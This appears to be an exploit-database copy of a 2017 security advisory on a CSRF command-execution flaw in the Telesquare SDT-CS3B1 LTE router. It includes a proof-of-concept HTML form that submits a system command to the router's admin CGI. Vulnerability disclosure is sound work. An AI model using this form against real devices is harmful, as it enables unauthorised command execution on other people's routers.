header-logo
Suggest Exploit
vendor:
SDT-CS3B1 LTE Router
by:
Gjoko 'LiquidWorm' Krstic
8,8
CVSS
HIGH
Authenticated Arbitrary System Command Execution
352
CWE
Product Name: SDT-CS3B1 LTE Router
Affected Version From: FwVer: SDT-CS3B1, sw version 1.2.0
Affected Version To: LteVer: ML300S5XEA41_090 1 0.1.0
Patch Exists: YES
Related CWE: N/A
CPE: h:telesquare:sdt-cs3b1_lte_router
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: lighttpd/1.4.20
2017

Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution

The router suffers from authenticated arbitrary system command execution. The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.

Mitigation:

Ensure that all user input is validated and sanitized before being used in system commands.
Source

Exploit-DB raw data:

Telesquare SKT LTE Router SDT-CS3B1 CSRF System Command Execution


Vendor: Telesquare Co., Ltd.
Product web page: http://www.telesquare.co.kr
Affected version: FwVer: SDT-CS3B1, sw version 1.2.0
                  LteVer: ML300S5XEA41_090  1 0.1.0
                  Modem model: PM-L300S

Summary: We introduce SDT-CS3B1 LTE router which is a SKT 3G and 4G
LTE wireless communication based LTE router product.

Desc: The router suffers from authenticated arbitrary system command
execution. The application interface allows users to perform certain
actions via HTTP requests without performing any validity checks to
verify the requests. This can be exploited to perform certain actions
with administrative privileges if a logged-in user visits a malicious
web site.

Tested on: lighttpd/1.4.20


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5443
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5443.php


22.12.2017

--


IDOR for system command interface:
----------------------------------

GET /admin/system_command.shtml HTTP/1.1



PoC GET CSRF request:
---------------------

<html>
  <body>
    <form action="http://10.0.0.17:8081/cgi-bin/admin.cgi">
      <input type="hidden" name="Command" value="sysCommand" />
      <input type="hidden" name="Cmd" value="uname%20-a" />
      <input type="hidden" name="T" value="8168008531337" />
      <input type="submit" value="Send" />
    </form>
  </body>
</html>